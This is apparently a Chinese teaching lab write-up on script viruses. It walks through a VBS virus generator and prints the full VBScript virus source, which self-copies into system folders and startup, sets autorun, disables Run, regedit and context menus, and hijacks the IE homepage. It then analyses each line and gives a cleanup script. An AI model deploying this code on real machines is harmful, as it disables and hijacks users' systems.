zoukankan      html  css  js  c++  java

  • 脚本病毒编写实验

    实验目的

    了解脚本与脚本病毒的基本概念 明确主要的脚本病毒的种类 掌握常见脚本病毒的原理 熟悉简单的脚本病毒的编写方法 利用所提到的工具进行上机实验,得到实验结果

    实验原理

    脚本程序是用脚本语言编制的程序,即用一条条脚本代码组成的完整的逻辑指令。脚本代码是用脚本语言编制的代码,一般来说脚本代码和脚本程序有时候通用。

    实验内容

    介绍脚本与脚本病毒的基本概念 借助脚本病毒生成器生成脚本病毒 理解生成的脚本病毒的作用机制 修复感染病毒的系统 查看脚本病毒的作用效果

    实验环境描述

    1、学生机与实验室网络直连;

    2、VPC1与实验室网络直连;

    3、学生机与VPC1物理链路连通。

    实验步骤

    1、学生单击实验拓扑按钮,进入实验场景,进入目标主机

    2、学生输入账号administrator ,密码123456,登录到实验场景中的目标主机。

    3、 借助脚本病毒生成器生成脚本病毒

    1)、打开桌面上vbs-virus.rar解压vbs-virus.rar,双击打开vir1,以运行vbs脚本病毒生成器,如下图所示。

    图片描述

    2)、脚本病毒生成器界面如下图所示。

    图片描述

    3)、点击“下一步”,进入“病毒复制选项”设定界面,根据需要进行设定。

    图片描述

    4)、点击“下一步”,进入“禁止功能选项”设定界面,根据需要进行设定

    图片描述

    5)、点击“下一步”,进入“病毒提示对话框”设定界面,根据需要进行设定。

    图片描述

    6)、点击“下一步”,进入“病毒传播选项”设定界面,根据需要进行设定。

    图片描述

    7)、点击“下一步”,进入“IE修改选项”设定界面,根据需要进行设定。注意,当勾选“设置默认主页”后,会弹出“设置主页”对话框,需要用户输入欲修改的IE主页地址。

    图片描述

    8)、点击“下一步”,选择所生成的脚本病毒存放的位置,点击“开始制造”,生成病毒。

    图片描述

    此时,可看到相应路径下,已经生成了脚本病毒文件

    图片描述

    4、 感染病毒,观察感染后的系统变化。

    1)、将生成的脚本病毒文件置于虚拟机中,双击使之运行。然后,为保证完整准确地查看病毒的感染效果,重启虚拟机中被感染的系统。。

    2)、观察系统文件夹下的异常变化,可以发现,C:\Windows、C:\Windows\system32下多了不明来源的脚本文件。

    图片描述

    3)、检查各项系统功能,发现右键菜单功能被禁止。开始菜单内,“运行”命令被去除。在C:\windows下运行注册表管理器程序regedit.exe,同样也会弹窗报错,提示功能被禁。

    图片描述

    4)、检查IE的各项功能,查看异常,会发现IE主页被恶意篡改。依此单击“菜单栏——工具——Internet 选项”,发现无法正常打开Internet 选项。另外,IE浏览器的右键快捷菜单功能也被禁用。

    图片描述

    1. 分析脚本病毒的源码,理解各条语句的含义

    1)、用记事本打开病毒脚本,查看其代码。代码内容摘录如下:

    1   On Error Resume Next

2   Set fs=CreateObject("Scripting.FileSystemObject")

3   Set dir1=fs.GetSpecialFolder(0)

4   Set dir2=fs.GetSpecialFolder(1)

5   Set so=CreateObject("Scripting.FileSystemObject")

6   dim r

7   Set r=CreateObject("Wscript.Shell")

8   so.GetFile(WScript.ScriptFullName).Copy(dir1&"\Win32system.vbs")

9   so.GetFile(WScript.ScriptFullName).Copy(dir2&"\ Win32system.vbs")

10  so.GetFile(WScript.ScriptFullName).Copy(dir1&"\Start Menu\Programs\启动\ Win32system.vbs")

11  r.Regwrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun",1,"REG_DWORD"

12  r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools",1,"REG_DWORD"

13  r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogOff",1,"REG_DWORD"

14  r.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ Win32system "," Win32system.vbs"

15  r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu",1,"REG_DWORD"

16  r.Regwrite

"HKCU\Software\Policies\Microsoft\InternetExplorer\Restrictions\NoBrowserContextMenu",1,"REG_DWORD"

17  r.Regwrite

"HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserOptions",1,"REG_DWORD"

18  r.Regwrite

"HKEY_USERS\.DEFAULT\Software\Microsoft\Internet Explorer\Main\Start Page",http://www.ta0ba0.com

    2)、分析各条语句含义。主要语句的含义分析如下:

    第一行语句的含义是启用错误处理程序,目的在于为了当程序发生错误的时候忽略错误而继续向下执行,从而不要打断程序的执行流程,保证后面的代码可以执行成功。

    第三行和第四行语句中,使用了GetSpecialFolder(folderspec)函数,当参数folderspec等于0时,函数返回值为Windows文件夹(一般为C:\Windows或C:\WINNT);当参数folderspec等于1时,函数返回值为System文件夹(常见于C:\Windows\system32)。

    第八行至第十行语句的作用依次为复制病毒文件夹道Windows文件夹、system32文件夹、启动菜单。

    第十一行至第十五行语句的作用依次为禁止“运行”菜单、禁止使用注册表编辑器、禁止注销菜单、开机自动运行以及禁止右键菜单。

    第十六行至第十八行语句的作用依次为禁用IE右键菜单、禁止Internet选项、设置默认主页为http://www.ta0ba0.com。

    1. 编写解毒脚本,消除病毒影响

    1)、打开记事本程序。根据病毒脚本内容,编写相应的解毒脚本(程序中自带了reset脚本),内容如下:

    1 Set fs=CreateObject("Scripting.FileSystemObject")

    2 Set dir1=fs.GetSpecialFolder(0)

    3 Set dir2=fs.GetSpecialFolder(1)

    4 Set so=CreateObject("Scripting.FileSystemObject")

    5 dim r

    6 Set r=CreateObject("Wscript.Shell")

    7 r.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce\deltree.exe","start.exe /m deltree /y "&dir1&"\ Win32system.vbs"

    8 r.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce\deltree.exe","start.exe /m deltree /y "&dir2&"\ Win32system.vbs"

    9 r.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce\deltree.exe","start.exe /m deltree /y "&dir1&"\Start Menu\Programs\启动\ Win32system.vbs"

    10r.Regwrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun",0,"REG_DWORD"

    11 r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools",0,"REG_DWORD"

    12r.Regwrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogOff",0,"REG_DWORD"

    13 r.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ Win32system ",""

    14 r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu",0,"REG_DWORD"

    15 r.Regwrite

    "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserContextMenu",0,"REG_DWORD"

    16 r.Regwrite

    "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserOptions",0,"REG_DWORD"

    17 r.Regwrite "HKEY_USERS\.DEFAULT\Software\Microsoft\Internet Explorer\Main\Start Page","about:blank"

    2)、将以上脚本语句保存为一个.vbs的脚本。双击运行之,然后重启系统,即可完成解毒工作。

    7.实验完毕,关闭虚拟机和所有窗口。
  • 相关阅读:
    【java】一维数组循环位移方阵
    【java】for循环输出数字金字塔
    C++编程tips
    C++中cin.get 和cin.peek 及其相关的用法
    ubuntu增加字符设备驱动程序/ 操作系统课程设计
    C++ Primer 学习笔记/ 处理类型
    C++学习,顶层const
    C++学习笔记/const和指针
    ubuntu16.04增加系统调用(拷贝)
    Java学习笔记#数组 循环遍历
  • 原文地址:https://www.cnblogs.com/lzkalislw/p/13628851.html
Copyright © 2011-2022 走看看